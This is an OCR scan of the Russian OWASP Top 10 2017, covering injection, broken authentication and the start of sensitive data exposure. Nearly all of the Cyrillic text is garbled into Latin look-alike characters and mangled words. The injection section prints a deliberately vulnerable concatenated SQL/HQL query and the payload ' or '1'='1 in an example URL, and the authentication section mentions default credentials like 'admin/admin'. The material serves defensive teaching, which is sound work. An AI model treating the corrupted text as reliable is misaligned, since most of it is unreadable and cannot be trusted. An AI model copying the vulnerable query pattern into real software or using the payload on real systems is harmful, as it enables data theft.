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Ton-10 OWASP 


yrpo3Bi 6e3onacHOCTM npunoaceroin - 2017 


A1:2017- 

BHeflpeHne 


A2:2017- 

HeflOCTaTKM 

ayTeHTucpMKauMM 

r \ 

A3:2017- 
Pa3maineHMe 

KOHCjDMfleHIlMaJlbHblX 
AdHHbIX 

T > 

A4:2017-BHeiUHMe 
cyiMHOCTnXML 
(XXE) 


A5:2017- 
HeflOCTaTKM 
KOHTponn flocTyna 


A6:201 7-HeKoppeKTHaa 

H3CTpOHK3 n3p3M6TpOB 
6e30n3CH0CTM 


A7:2017- 
MexcaiiTOBoe 
BbinojiHeHMe 
cueHapneB (XSS) 

r \ 

A8:2017- 
He6e3onacHan 
flecepnajin3amin 

A9:2017- 
Mcnojib30BaHiie 
KOMIIOHeHTOB c 
M3BeCTHblMM 
YB3BMM0CTBMM 

A10:2017- 

HeflOCTaTKM 
xypHajinpoBaHMB 
M MOHMTOpilHra 


Yh 3 bmmoctm, CBfl3aHHbie, HanpMMep, c BHeflpeHMeM SQL, NoSQL, OS m LDAP, B 03HMxai0T, 

Korfla HenpoBepeHHbie AaHHbie OTnpaBJiniOTCfl MHTepnpeTaTopy b cociaBe KOMaHflbi mjim 
3anpoca. BpeAOHOCHbie AaHHbie MoryT 3acTaBMTb MHTepnpeTaTop BbinojiHMTb 
HenpeAycMOTpeHHbie KOMaHAbi mjim oOpaTMTbcn k AaHHbiM 6e3 npoxoxAeHMn cooTBeTCTByiOLAeM 
aBT0pM3aUMM. 

OyHKUMM npi/inoxeHMM, CBH3aHHbie c ayTeHTMc[)MxauMeM m ynpaBJieHMeM ceccMAMM, nacTO 
HexoppeKTHO peariM3yK)TCH, no3BOJinfl 3JioyMbiLUJieHHMxaM CKOMnpoMeTi/ipoBaTb naporiM, xjiiohm 
mjim ceccMOHHbie TOKeHbi, a Taxxe axcnjiyaTMpoBaTb Apyrwe olum 6 xm peajiM3auMM ajih 
B peivieHHoro mjim nocTonHHoro nepexBaia yneTHbix 3annceM nojib30BaTejieM. 

MHorne Be6-npmioxeHMfl m API mvieiOT njioxyio 3amnTy xpmtmhhhx cjDMHaHCOBbix, MeAMUMHCXMx 
mjim nepcoHanbHbix AaHHbix. 3jioyMbuuneHHMXM MoryT noxMTMTb mjim M 3MeHHTb3Tn AaHHbie, a 
3aTeM OCymeCTBHTb MOLUeHHMHeCKMe A6HCTBMH C XpeAHTHbIMM XapTaMM Mil 1/1 nepCOHaJlbHblMM 
AaHHbiMM. KoHctDMAeHUManbHbie AaHHbie Tpe6yiOT AonojiHMTejibHbix Mep 3aiAHTbi, HanpMMep mx 
lli i/icjDpoBa h 1/15=1 npM xpaHeHMM mjim nepeAane, a Taxxe cneuMajibHbix Mep npeAOCTopoxHOCTM npM 
pa6oTe c 6pay3epoM. 

Ciapbie mjim njioxo HacipoeHHbie XML-npoueccopbi o6pa6aTbiBaK)T ccbuiKM Ha BHeniHMe 
cyLAHOCTM BHyipM AOxyMeHTOB. 3 tm cyLAHOCTM MoryT 6biTb Mcnojib30BaHbi p,nn AOCTyna k 
BH yipeHHMM (jDamiaM nepe3 o6pa6oTHMKM URI cjDaMJiOB, o6LAMe nanxM, cxaHMpoBaHMe nopTOB, 
yAajieHHoe BbinojiHeHMn koas m 0Txa3 b oOcjiyxMBaHMM. 

fleMCTBMa, pa3peujeHHbie ayieHTMcjDMUMpoBaHHbiM nojib30BaTejiHM, 3anacTyio HexoppexTHO 
XOHTpOJIMpyKDTCfl. 3jlOyMblLUJieHHMXM MOryT B0Cn0Jlb30BaTbCH 3TMMM HeAOCTaTXaMM M nOJiyHMTb 
HecaHxuMOHMpoBaHHbiM AOCTyn xyneTHbiM 3anMCHM Apyrnx nojib30BaiejieM mjim 
xoHcfDMAeHUMajibHOM MHcj)opMauMM, a Taxxe M3MeHMTb nojib30BaiejibcxMe AaHHbie mjim npaBa 
AOCTyna. 

HexoppexTHan HacTpoMxa 6e3onacHOCTM nBnneTcn pacnpocTpaHeHHOM olum 6 xom. 3 to 
npoMexoAMT M3-3a Mcnojib30BaHMn CTaHAapTHbix napaMeTpoB 6e3onacHOCTM, HenojiHOM mjim 
cneuMc|DMHHOM HacTpoMXM, OTxpbiToro oSjiaHHoro xpaHeHMH, HexoppexTHbix HTTP-3arojiOBxoB m 
noApo6Hbix coo6LAeHMM 06 OLUM6xax, coAopxaiAMx xpMTMHHbie AaHHbie. Bee OC, cfjpeMMBopxM, 
6M6jiMOTexM m npMJioxeHMn aojixhh 6biTb He TOJibxo HacTpoeHbi aojixhhm o6pa30 M, ho m 
CB oeBpeMeHHO xoppexTMpoBaTbcn m oOHOBJinTbcn. 

XSS MMeeT MecTO, xorAa npMJioxeHMe AoSaBJineT HenpoBepeHHbie AaHHbie Ha HOByio Be6- 
CTpaHMuy 6e3 mx cooTBeTCTByiomoM npoBepxM mjim npeo6pa30BaHMH, mjim xorAa oSHOBJineT 
OTxpbiTyio CTpaHMuy nepe3 API 6pay3epa, Mcnojib3yn npeAOCTaBJieHHbie nojib30BaTejieM 
AaHHbie, coAepxaLAMe HTML- mjim JavaScript-xoA- C noMOLAbio XSS 3JioyMbuuneHHMXM MoryT 
BbinojiHHTb cueHapMM b 6pay3epe xepTBbi, no3BOJinx)LAMe mm nepexBaTbiBaTb 
nojib30BaTejibcxMe ceccMM, noAMeHHTb CTpaHMAbi cama mjim nepeHanpaBJinTb nojib30BaTejieM 
Ha BpeAOHOCHbie caMTbi. 

He6e3onacHan A0cepMajiM3auMn nacTO npMBOAHT x yAajieHHOMy BbinojiHeHMKD xoAa. Olum 6 xm 
A ecepMajiM3auMM, He npMBOAfliAne x yAajieHHOMy BbinojiHeHMio xoAa, MoryT 6biTb Mcnojib30BaHbi 
AJifl aTaxc noBTopHbiM BOcnpoM3BeAOHMeM, BHeApeHMeM m noBbiLueHMeM npMBMJierMM. 


KoMnoHeHTbi, Taxne xax SmSjimotbxm, cjDpeMMBopxM m nporpaMMHbie MOAynM, 3anycxaiOTcn c 
npMBMJierMnMM npMJioxeHMfl. SxcnjiyaTauMn yn3BMMoro xoMnoHeHTa MOxeT npMBecTM x noTepe 
AaHHbix mjim nepexBaTy xohtpojih HaA cepBepoM. Mcnojib30BaHMe npMJioxeHMHMM m API 
XOMnOHeHTOB C M3BeCTHblMM yfl3BMM0CTflMM MOXeT HapyLLIMTb 3aLAMTy npMJioxeHMn m npMBecTM 
X Cepbe3HblM nOCJieACTBMHM. 

HeAOCTaTXM xypHajiMpoBaHMH m MOHMTopMHra, a Taxxe OTcyTCTBMe mjim HeacfDctDexTMBHoe 
MCn0Jlb30BaHMe CMCTeMbl pearMpOBaHMH Ha MHAMAOHTbl, n03B0JineT 3J10yMblLUJieHHMXaM 
pa3BMTb aTaxy, cxpbiTb CBoe npMcyTCTBMe m npoHMXHyTb b Apyrne CMCTeMbl, a Taxxe M3MeHMTb, 
M3BJieHb MJIM yHMHTOXMTb AaHHbie. llpOHMXHOBeHMe B CMCTeMy 06bNH0 06HapyXMBai0T TOJlbXO 
nepe3 200 AneM m, xax npaBMJio, CTopoHHMe MCCJieAOBaTejiM, a He b paMxax BHyTpeHHMx 
npoBepox MJIM MOHMTOpMHra. 
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BexTopbi 
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HeAOCTaTKM 

6e3onacHOCTM 
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riOC/ieflCTBMfl 
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CllOXHOCTb 

PacnpocTpaHeHHOCTb: 1 

C/lOXHOCTb 

TexHM4ecKMe: 3 | 

A/w 

)KcnnyaTaunn: 3 

_ 11 _L 

o6Hapyxehma:3 

6ki3Heca ? 


riOHTM J 1 K) 60 M MCTOHHMK AaHHbIX MOXeT 
OKa3aTbca BeKTopoM Ana BHeApeHM^: 
nepeMeHHbie oxpyxeHMH, napaMeTpbi, 
BHeniHMe m BHyTpeHHMe Be6-cnyx6bi, a 
Taxxe Bee TMnbi nojib30BaTejieM. 
BHeAPeHHfl CTaHOBHTCfl B03M0XHblMM, 
eCJIM 3J10yMblLUJieHHMK MOXeT OTnpaBfiaTb 
MHTepnpeTaTopy BpeAOHocHbie AaHHbie. 


BHeApeHmq oco6eHHO pacnpocTpaHeHbi b cTapoM xoAe. 
Yh3bmmoctm nacTO BCTpeHaxrrcfl b SQL- LDAP-, XPath- 
mjim NoSQL-3anpocax, ci/icieMHbix KOMaHAax, XML- 
o6pa6oTHMKax, SMTP-3arojiOBxax, H3bixax BbipaxeH mm m 
ORM- 3anpocax. 

BHeApeHMfl nerKoo6HapyxMTb npw aHann3e KOAa. 
CxaHepbi n <t>a33epbi MoryT noMOHb 3noyM biujjieHHMxaM 
HaMTM nOA 06 Hbie y^3BMMOCTM. 


BHeApeHMfl MoryT npwBecTM k noiepe 
AaHHbix, mx noBpexAeHMio mjim 
pa3rnaLueHMio TpeTbMM jiMuaM, a Taxxe k 
OTK a3y b o6cnyxMBaHMM. B HexoTopbix 
cxiynanx KOHTpoiib HaA y3noM MoxeT 
6biTb noiiHOCTbio nepexBaneH. 

riocjieACTBMH p,nn 6M3Heca 33bmcht ot 
XpMTMHHOCTM npMJIOXeHMH M AaHHbIX. 


HBJi$xeTC$x jim npraioxeime ymsbmmbim? 

llpMJioxeHMe yH3BMMO, eciiM: 

• BBOAHMbienonb30BaTeneM AaHHbie He npoBepniOTCH, He cjDMJibTpyiOTCH 
MTIM He OHMLAaiOTCfl; 

• AnnaMMHecKMe 3 anpocbi mjim HenapaivieTpM 30 BaHHbie Bbi 30 Bbi 6e3 
KOHTeKCTHOrO 3 KpaHMpOB 3 HMH HanpflMyK) MCnOJlb 3 yiOTCH B 
MHTepnpeiaTope; 

• BpeAOHocHbie AaHHbie Mcnojib3yK)Tcn b noMCKOBbix napaivieipax 
o6-beKTHO-penHUMOHHoro OTo6paxeHMH p,nn M3BJieneHMH 
AOnOJlHMTeilbHOM, XpMTMHHOM MHCjDOpMaUMM; 

• BpeAOHocHbie AaHHbie Mcnoiib3yiOTCH mjim Ao6aBJinioTCH t.o., hto SQL- 
koa mjim KOMaHAbi coAepxaTCTpyKTypHbie m BpeAOHocHbie AaHHbie b 
AMHaMMHecKMX3anpocax, KOMaHAax mjim xpaHMMbix npoueAypax. 

HaM6ojiee pacnpocTpaHeHHbiMMHBJiniOTCH SQL-, NoSQL-, ORM-, 

LDAP-, EL- mjim OGNL-BHeApeHMH, a Taxxe BHeApeHMH xoiviaHAOC. To 
xe caivioe xacaeTcn Bcex MHTepnpeTaTopoB. AHajiM3 McxoAHoro xoAa 
HBJineTCH JiyHLUMM cnoco6oM o6HapyxeHMH BHeApeHMM, 3a xoTopbiM 
cneAyeT nonHoe 3BTOMaTM3MpoBaHHoe TecTMpoBaHMe Bcex bboammhx 
napaivieTpoB, 3aronoBxoB, URL, xyxM, JSON-, SOAP- m XML-AaHHbix. 
OpraHM3auMM Taxxe MoryT Bxnx)HaTb b npouecc HenpepbiBHOM 
MHTerpauMM m pa3BepTbiBaHMH no (Cl/CD) CTaTMHecxoe (SAST) m 
AMH aMMHecxoe ( PAST ) TecTMpoBaHMe xoAa m npMJioxeHMM AJifl 
o6HapyxeHMH HOBbix yn3BMMOCTei/i nepeA BHeApeHMeM npMJioxeHMM b 
npOM3BOACTBO. 


npHMepu cijeHapweB stsk 

CueHapMM m llpMJioxeHMe Mcnonb3yeT HeAOBepeHHbie AaHHbie npM 
C03A3HMM cjieAyx)LAeroyH3BMMoroSQL-Bbi30Ba: 

String query = "SELECT* FROM accounts WHERE 
custID-" + request.getParameter("id") + . ; 

CueHapMM NR2 Se3oroBopoHHoe AOBepMe npMJioxeHMM x cjDpeMMBopxaM 
MoxeT npMBecTM x noHBJieHMio yn3BMMbix 3anpocoB (HanpMMep, b 
H 3bixe 3anpocoB HQL): 

Query HQLQuery = session.createQuery("FROM accounts 
WHERE custID-" + request.getParameter("id") +.); 

B o6omx cjiyHanx3JioyMbiLUJieHHMX M3MeHneT b CBoeM 6pay3epe 
3HaneHMe napaivieTpa "id" p,nn OTnpaBXM ' or'I'-l. HanpMMep: 

http://example.com/app/accountView7id- or T='1 

H3MeHeHMe o6omx 3anpocoB no3BormeT nojiyHMTb Bce3anMCM M3 
Ta6jiMUbi yneTHbix AaHHbix. Bonee cepbe3Hbie aTaxM no3BOJinx)T 
M3MeHMTb mjim yAanMTb AaHHbie, a Taxxe Bbi3BaTb xpaHMMbie 
npoueAypbi. 


Kaic npeflOTBpaTMTt 

flnH npeAOTBpameHMH BHeApeHMM Heo 6 xoAMMO M3onMpoBaTb AaHHbie ot 
X0M3HA M 3 anpOCOB. 

• Hcnonb 3 yMTe 6 e 3 onacHbiM API, Mcxnx)HaK)mMM npMMeHeHMe 
MHTepnpeTaTopa mjim npeAOCTaBnniomMM napaMeTpM30BaHHbiM 
MHTepcfjeMC, jim 6 o Mcnonb3yMTe MHCTpyMeHTbi o 6 "bexTHo-permi 4 MOHHoro 
OTo 6 paxeHMH (ORM). 

npMMenaHMe: Aaxe napaMeTpM30BaHHbie xpaHMMbie npogeAypbi MoryT 
npMBecTM x SQL-BHeApeHMHM, ecriM PL/SQL mjim T-SQL no3BOJinioT 
npMcoeAMHHTb 3anpocbi m AaHHbie mjim BbinoriHHTb BpeAOHOCHbiM xoa c 
noMOLAbK) EXECUTE IMMEDIATE mjim exec(). 

• PeanM 3 yMTe Ha cepBepe 6 enbie cnMCXM A-* *™ npoBepxM BXOAHbix 
AaHHbix. 3 to, xoHeHHO, He oSecneHMT noriHyio 3aiAMTy, nocxonbxy 
MHorne npMJioxeHMM Mcnojib3yx)T cneucMMBOJibi, HanpMMep, b 
T eXCTOBbIX oSjiaCTHX MJIM API P,H9\ M 06 MJlbHblX npMJioxeHMM. 

• flnn ocTajibHbix AHHaMMHecxMx 3anpocoB peajiM3yMTe axpaHMpoBaHMe 
cneucMMBOJiOB, Mcnojib3yn cooTBeTCTByioLAMM MHTepnpeTaTopy 
CMHT3XCMC. 

npMMenaHMe: 3 JieMeHTbi SQL-cTpyxTypbi, Taxne xax Ha 3 BaHMH Ta 6 jiMu 
mjim CTOJ 16140 B, Henb3H axpaHMpoBaTb, noaTOMy npeAOCTaBrmeMbie 
nojib30BaTejiHMM Ha3BaHMH npeACTaBJinioT onacHocTb. Sto o 6 bNHan 
npoSjieMa nporpaMM a^ cocTaBJieHMH oTHeTOB. 

• l/lcnojib 3 yMTe b 3 anpocax LIMIT mjim ApyrMe 3 JieMeHTbi ynpaBJieHMH 
SQL a^i^ npeAOTBpaLAeHMH yTenex AaHHbix. 

Ccluikm OWASP 

• flpoaxTMBHan 3amma OWASP: f1apaMeTPM3auMn 3anpocoB 

• CTaHAapT noATBepxAeHMfl 6e3onacHOCTM npMJioxeHMM OWASP 
(ASVS): V5 flpoBepxa BXOAHbix AaHHbix m xoampobxm 

• Pvxoboactbo OWASP no TecTMpoBaHMio: BHenpeHMe SQL-xona . 

X0M3HA. ORM 

• flaMHTxa OWASP: flpeAPTBpameHMe BHeapeHMM 

• flaMHTxa OWASP: flpeAPTBpameHMe SQL-BHeapeHMM 

• flaMHTxa OWASP: flpeAPTBpameHMe BHeapeHMM b Java 

• flaMHTxa OWASP: f1apaMeTpM3auMH 3anpocoB 

• CnpaBOHHMx OWASP no aBTOMaTM3MpoBaHHbiM aTaxaM Ha Be6- 

npMJioxeHMn - QAT-014 

CTOpOHHPie 

• CWE-77: BHeapeHMe xom3ha 

• CWE-89: BHenpeHMe SQL 

• CWE-564: BHenpeHMe SQL-xona c Mcnonb30BaHMeM Hibernate 

• CWE-917: BHenpeHne xona H3bixa BbipaxeHMM 

• PortSwigaer: BHenpeHMe b cepBepHbie Lua6noHbi 
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^ flOC/ieflCTBMfl 


3llOyMblLUJieHHMKM MMetOTflOCTyn K COTHflM 
TbICflH fleMCTBMTeilbHblX KOMOMHaUMM HMeH 
m naponeM p,nn aTaK Ha ynembieaanMCM, 
cnucKaM CTa h Aa pm bix y 1 Hem bix Aa h h bix 
aAM mhMCT paTopoB, MHCTpyMeHTaM Ann 
aBTOMaTM3aunM aiax MeTOAOM noA^opa n 
aiax no cnoBapnM. ATaKM Ha ceccMM 
XOpOLUO H3yHeHbl, oco6eHHo b Haem 
AeMCTBytoLAHXTOKeHOB cecc mm. 


HeAOCTaTKM ayTeHTMcfDMKauMM oneHb pacnpocTpaHeHbi M3-3a 
MCnOJIHeHMJq M peaJlM3ai4MM 60 JlbLUMHCTBa cpeACTB 
MAeHTMcfDMKauMM m KOHTpona AOCTyna. YnpaBneHMe ceccMAMM 
nBrmeTca ochobom ayTeHTMcjDMKauMM m KOHTpona AOCTyna m 
npMcyTCTByeT bo Bcex npMnoxeHMax c KOHTponeM coctoahma. 

ATaKyroLAMe MoryT oOHapyxMTb HeAOCTaTKM ayTeHTMcjDMKauMM 
BpyHHyjo m SKcnnyaTMpoBaTb mx, Mcnonb3ya 
aBTOMaTM3MpOBaHHbie MHCTpyMeHTbl, CnMCKM naponeM M 3T3KM 

n? mm 


J2,nn KOMnpoMeTauuMCMCTeMbi 3JioyMbiLUJieHHMKy 
AOCTaTOHHO nOJiyHMTb AOCTyn K HeCKOJlbKMM 
o6bNHblM MJIM OflHOM aflMMHMCTpaTOpCKOM 
yneTHOM 3armcn. B 33bmcmmoctm ot o6jiacTM 
Mcnonb30BaHi/ifl npMJioxeHMn pe3yjibTaTOM 
MOxeT CTaTb OTMbiBaHne fleHer, MOLueHHMHecTBO 
b ccfjepe counajibHoroo6ecneHeHMfl mjim Kpaxa 
nepcoHa/ibHbix flaHHbix, a TaKxe paarjiameHne 
OXpaH^eMOM 33K0H0M, KOHCjDMfleHUMaJlbHOM 
MH(J)OpMaUMM. 


HBjiaeTca jin npnji05KeHne 
y$33BHMBIM? 

lloATBepxAeHMe jimhhoctm nojib 30 BaTejin, ayTeHTMcjDMKauMH m ynpaBJieHMe 

ceccM^MM MrpafOT BaxiHyto pojib b 3amMTe ot aTaK, CBH3aHHbix c 

ayTeHTMc|DMKauMeM. 

ripMJioxeHMe MMeeT HeAOCTaTKM b ayTeHTMcjDMKauMM, ecjiM: 

• AonycKaeTca npoBeAeHMe aBTOMaTM3MpoBaHHbix aTaK, HanpMMep, Ha vneTHbie 

, KorAa y aTaKyiOLAero ecTb cnncoK AeMCTBytomMx MMeH m napojiei/i 
nojib30BaTe;ieM; 

• AonycKaeTCH npoBeAeHMe aTaK mgtoaom noA6opa mjim Apyrnx 
aBTOMaTM3MpoBaHHbix aTaK; 

• AonycKaeTCH Mcnojib 30 BaHMe CTaHAapmbix, HeHaAexHbix mjim xopomo 
M 3 BecTHbix napojieM, HanpMMep, "Passwordl" mjim "admin/admin“; 

• Mcnojib 3 yK)Tcn HeHaAexHbie mjim HeacfDcjDeKTMBHbie MeTOAbi BoccTaHOBJieHMn 
yneTHbix AaHHbix m napojieM, HanpMMep, "oTBeTbi Ha ocHOBe 3 HaHMM", KOTopbie 
HBJiHHDTcn He 6 e 3 onacHbiMM; 

• Mcnojib 3 yK)Tcn He 3 aLUMcj 3 poBaHHbie, 3 aLUM(})poBaHHbie mjim HeHaAexHO 
xeuiMpoBaHHbie napojiM (cm. A3:2017-Pa3i7iameHne KOH<bnfleHuna/ibHbix aaHHbix 

• OTcyTCTByeT mjim HBJineTcn HeactDcfjeKTMBHOM MHorocfDaKTopHan ayTeHTMcfjMKauMn; 

• OTo6paxaK)Tcn MAeHTM(})MKaTopbi ceccMM b URL (HanpMMep, nepe3anMCb URL); 

• He MeHHfOTcn MACHTMcjDMKaTopbi ceccMM nocjie ycneuiHoro BxoAa b CMCTeMy; 

• HeKOppeKTHO aHHyJlMpytOTCH MAeHTMCjDMKaTOpbl CeCCMM. ll0Jlb30BaTeJlbCKMe 
ceccMM MJIM TOKeHbl ayTeHTM({)MKaUMM (b HaCTHOCTM, TOKeHbl eAMHOrO BXOAa 
(SSO)) HenpaBMJibHO aHHyjiMpytOTcn npM BbixoAe M3 CMCTeMbi mjim 6e3AeMCTBMM. 


KaK npeflOTBpaTMTt 


l~Ae 3 to bo3moxho, peajiM3yMTe MHorocfjaKTopHyK) ayTeHTMcfDMKauMK) Ann 
n peAOTB pa me h m n aBTOMaTM3MpoBaHHbix aTaK, aTaK Ha yneTHbie 3anMCM m 
M eTOAOM noASopa, a TaKxe noBTopHoro Mcnojib30BaHMH yKpaAeHHbix ynembix 
AaHHbix. 

He Mcnojib3yMTe C03AaBaeMbie no yMOJinaHMio (cTaHAapTHbie) ynembie 
AaHHbie, 0 C 06 eHH 0 AJ1H aAMMHMCTpaTOpOB. 

PeajiM3yMTe npoBepKy hba^xhoctm napojieM, HanpMMep, npoBepnn BHOBb 
C03AaBaeMbie mjim M3MeHneMbie napojiM no cnMCKV "10000 HaMxy/iLUMx 
napojieM" . 

YCTaHOBMTe ATIMHy, CJlOXHOCTb M nepMOAMHHOCTb CMeHbl napojieM B 
cooTBeTCTBMM c pvkobozictbom NIST 800-63 B (oa3/ieji 5.1.1 "3anoMMHaeMbie 
CeKPeTbl") MJIM J 1 K) 60 M APyrOM COBpeMeHHOM napOJlbHOM nOJIMTMKOM. 

OSecnenbTe 3amMTy perMCTpauMM, BOCCTaHOBJieHMn ynen-ibix AaHHbix m API ot 
aTaK MeTOAOM nepenMCJieHMH, Mcnojib3yn bo Bcex OTBeTax oflMHaKOBbie 
C 006 LAeHMH. 

OrpaHMHbTe mjim 3HanMTejibH0 yBejiMHbTe MHTepBaji MexAy HeyAanHbiMM 
nonbiTKaMM BxoAa. PerMCTpMpyMTe Bee HeyAanHbie nonbiTKM m yBeAOMJiHMTe 
aAMMHMCTpaTOpOB npM o6HapyxeHMM aTaK Ha yneTHbie AaHHbie, mctoaom 
noASopa mjim jiio6bix ApyrMx aTaK. 

l/lcnojib3yMTe cepBepHbie, HaAexHbie, BCTpoeHHbie MeHeAxepbi ceccMM, 
reHepMpyiOLAMe nocjie bxoa3 b CMCTeMy HOBbie, cjiynaMHbie MAeHTMcfDMKaTopbi c 
BbICOKOM CTeneHbK) 3HTp0nMM. l/lAeHTMC|DMKaTOpbl ceccMM He AOJIXHbl 
npMcyTCTBOBaTb b URL, a AOJixHbi 6e3onacHO xpaHMTbcn m aHHyjiMpoBaTbcn 
nocjie BbixoAa M3 CMCTeMbi, npocTon mjim HacTynjieHMn a6cojiK)THoro TaMM-ayTa. 


npHMepu ci^eHapneB aTaK 

Cneuapm N21: ATaKa Ha vneTHbie 3anMCM, c Mcnonb30BaHMeM 
cnMCKOB M3Becmbix naponeM . ^BJi^eTCH oneHb pacnpocTpaHeHHOM. 

EcilM B npMJlOXeHMM HeT 33IAMTbl OT aBTOM3TM3MpOB3HHbIX aTaK MJIM 
aTaK Ha ynembie 3anMCM, to oho MOxeT 6biTb Mcnonb30BaHO p,nn 
onpeAe/ieHMH AewcTByjOLAMX ynembix AaHHbix. 

Cuenapm Ns2: EonbLiJMHCTBo aTaK Ha ayTeHTMcjDMKauMio cBH3aH0 c 
Mcnoiib30BaHMeM MCKJiiOHMTejibHO naponeM. PaHee CHMTaBLiJMecn 
xopouJMMMTpe6oBaHMn k CMeHe naponn m erocnoxHOCTM 
cnoco6cTByiOTMcnonb30BaHMio m nepeMcnonb30BaHMio 
nonb30BaTenniviM HeHaAexHbix naponeM. OpraHM3auMHM 
peKOMeHAyeTcn OTKa3aTbcn ot noAo6HOM npaKTMKM (cm. NIST 800-63) m 
BH eAPHTb MHOrOC|DaKTOpHyK) ayTeHTMCjDMKaUMIO. 

CueHapMM N23: TaMM-ayTbi ceccm HacTpoeHbi HeKOppeKTHO. JIioah 
Mcnonb3yiOT oOLAeAOCTynHbie KOMnbiOTepbi p,nn AOCTyna k 
npMnoxeHMio, a BMecTO "BbixoAa M3 npMnoxeHMn" npocTO 3aKpbiBaiOT 
BKnaAKy m yxoA^T. 3noyMbiujneHHMK MoxeT OTKpbiTb tot xe caMbiM 
6pay3ep, cnycm nac, m Bocnonb30BaTbcn Bee eLAe A^MCTByioiAeM 
ayTeHTMcjDMKaAMeM nonb30BaTenn. 


CCBUIKM 

OWASP 

• flpoaKTMBHan 3auiMTa OWASP: peanM3auMn 3aiAMTbi 

MAeHTMCbMKaUMOHHbIX AaHHbix M aVTeHTMCb MK3LIMM 

• CTaHAapT noATBepxAeHMn 6e3onacHQCTM npMnoxeHMM OWASP 

(ASVS): V2 AvTeHTMc|3MKauMn . V3 YnpaBneHMe ceccMHMM 

• PVKOBOACTBO OWASP no TeCTMpOBaHMK): l/lAeHTMC|3MKaUMOHHbie 

AaHHbie . AvTeHTMclJMKauMn 

• flaMHTKa OWASP: AvTeHTMcjjMKauMn 

• flaMHTKa OWASP: YTeHKa vneTHbix AaHHbix 

• flaMHTKa OWASP: 3a6biTbiM naponb 

• flaMHTKa OWASP: YnpaBneHMe ceccMHMM 

• CnpaBOHHMK OWASP no aBTOMaTM3MpoBaHHbiM aTaxaM 

CTOpOHHPie 

• NIST 800-63b: 5.1.1 3anoMHHaeMbie ceKpeibi 

• CWE-287: HeKoppeKTHaa ayTeHTMcjjMKauMR 

• CWE-384: Oi/iKcaiiMR ceconn 
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# Hocnc-0crs*ts 


BMeCTO B3J10Ma MeX3HH3M0B LUHCppOBaHHH 
3J10yMblLUJieHHHKH KpaflyT KJ1KHH, npOBOflBT 
aiaxn no npnHunny "nejiOBeK nocepeflUHe" hjih 
nojiynaiOT AaHHbie b He3aiiinc|DpoBaHHOM BUfle c 
cepBepa, b npouecce nx nepeflann hjih H3 
Knuema nojib30BaTejin, HanpHMep, 6pay3epa. 
noflo6Hbie aiaxn o6bNHO npoBOflBTcn BpyHHyio. 
PaHee nojiyneHHbie 6a3bi AaHHbix napojien 
MoryT 6biTb B3JiOMaHbi MeTOflOM nofl6opa c 
ncnojib30BaHneM rpactDunecKnx npoueccopoB. 


Ha npoT^xeHMM nocneflHMXJieTflaHHaaaTaKafiBJiaeTca 
caMOM pacnpocTpaHeHHOM h onacHOM. Maine Bcero 
BCTpenaeTCfl OTCyTCTBMe LUMCfDpOBaHMjq KOHCfDMfleHUMaJlbHblX 
AaHHbix, a npn HannHnn nacTo ncnojib3yioTCfl HeHaflexHbie 
anropmMbi, npoTOKOJibi, LuncjDpbi, MeTOflbi xpaHeHnn 
xeujupoBaHHbix napojien win MeTOAbi C03Aam/m n 
ynpaBiieHMfi KJiioHaMH. Taxxe nerKo o6HapyxHTbyH3BHMocTH 
Ha dopoHe cepBepa A-nfl nepeAaBaeivibix AaHHbix, ho He 
xpaHMMbix. 


l/l3-3a yfl3BHMOCTH HaCTO CTpaAaiOT Bee 
nepcoHaxibHbie AaHHbie (MeAnunHCKwe 
3anncn, yneTHbie AaHHbie, AaHHbie 
KpeAHTHbIX KapT), KOTOpbie AOJIXHbl 6blTb 
3aLAmneHbi no 3aKOHy, Hanpmviep, b 
cooTBeTCTBMM c 06lahm pemaivieHTOM EC 
no 3aLAme AaHHbix (GDPR) win 

JlOKailbHblM H 33KOHaMM O 
( Hen£MKOCHOBeHHOCTM B AaHHblX^^^^^ 


npmioaceHPie 


HBJiaeTCa JIM 
y$33BHMBIM? 

llpexAe Bcero Heo6xoAHMO onpeAejiHTb TpebyeMbin ypoBeHb 3annTbi AaHHbix 
npH hx nepeAane h xpaHeHHH. Hanpmviep, napojin, HOMepa KpeAHTHbix KapT, 
MeAHUHHCKHe 3anncn, nepcoHa/ibHbie AaHHbie h KOMMepnecKne TanHbi TpeSyiOT 
AonojiHMTe/ibHOH 3annTbi, ocoSeHHO ecjiHOHH noAnaAaiOT noA ASHCTBi/ie 3aK0Ha 
o HenpHKOCHOBeHHOCTH AaHHbix (Hanp., 06nero pemaMeHTa EC no 3annTe 
AaHHbix (GDPR)) hjih 3aK0Ha o 3annTe cpHHaHCOBbix AaHHbix (Hanp., CiaHAapia 
6e3onacHOdn AaHHbix b ccpepe n/iaiexHbix KapT (PCI DSS)). 

• LUi/icjDpyiOTCH jih nepeAaBaeMbie AaHHbie? Oto Kacaeicn npoTOKOJiOB nepeAann 
AaHHbix, t3khx K3K HTTP, SMTP h FTP. Oco6eHHO onaceH BHeujHHH HHTepHeT- 
TpacfiHK. llpoBepbTe Becb BHyTpeHHnn TpacpHK, Hanpmviep, MexAy 
6ajiaHCnpoBLAHKaivin Harpy3Kn, Be6-cepBepaMn h BHyTpeHHHMH CHCTeiviaMH. 

• LUncppyiOTCH jih xpaHHJinna kphthhhhx AaHHbix, a Taxxe pe3epBHbie Konnn? 

• Mcnojib3yiOTcn jih no yMOJinaHHio hjih b 6ojiee paHHHx Bepcnnx yciapeBLune hjih 
HeHaAexHbie ajiropHTMbi Lunc|DpoBaHHH? 

• Mcnojib3yiOTcn jih co3AaHHbie no yiviojinaHHio, HeHaAexHbie hjih OAHHaKOBbie 
LUHCfDpOKJHOHH, a TaKXe npHMeHHIOTCn JIH COOTBeTCTByiOLAHe MexaHH3Mbl 
KOHTPOJIH H CMeHbl KJlKDHeH? 

• Mcnojib3yeTcn jih LuncppoBaHHe, Hanpniviep, npncyTCTByiOT jih AnpeKTHBbi 
6e3onacHOCTH nojib30BaiejibCKHx areHTOB (6pay3epoB) h 3arojiOBKH? 

• llpoBepneT jih nojib30BaiejibCKHH areHT (Hanp., npnjioxeHne hjih noHTOBbin 
KJIHeHT) AGHCTBHTeJlbHOCTb nOJiyneHHblX CepTHCpHKaTOB? 

Cm. CiaHAapT noATBepxAeHnn 6e3onacHOCTH npnjioxeHHH: KpnnTorpacbHH (V7) . 
3amHTa ziaHHbix (V9) h SSL/TLS (VI 0). 


Kaic npeflOTBpaTMTt 


BbinojiHHTe, Kax MHHHMyM, cjieAyionee, a Taxxe 03HaK0MbTecb c MaiepnajiaMH b 

pa3AeJie "CcbiJiKH": 

• KnaccHcfjHUHpyHTe AaHHbie, o6pa6aibiBaeMbie, xpaHHMbie hjih nepeAaBaeMbie 
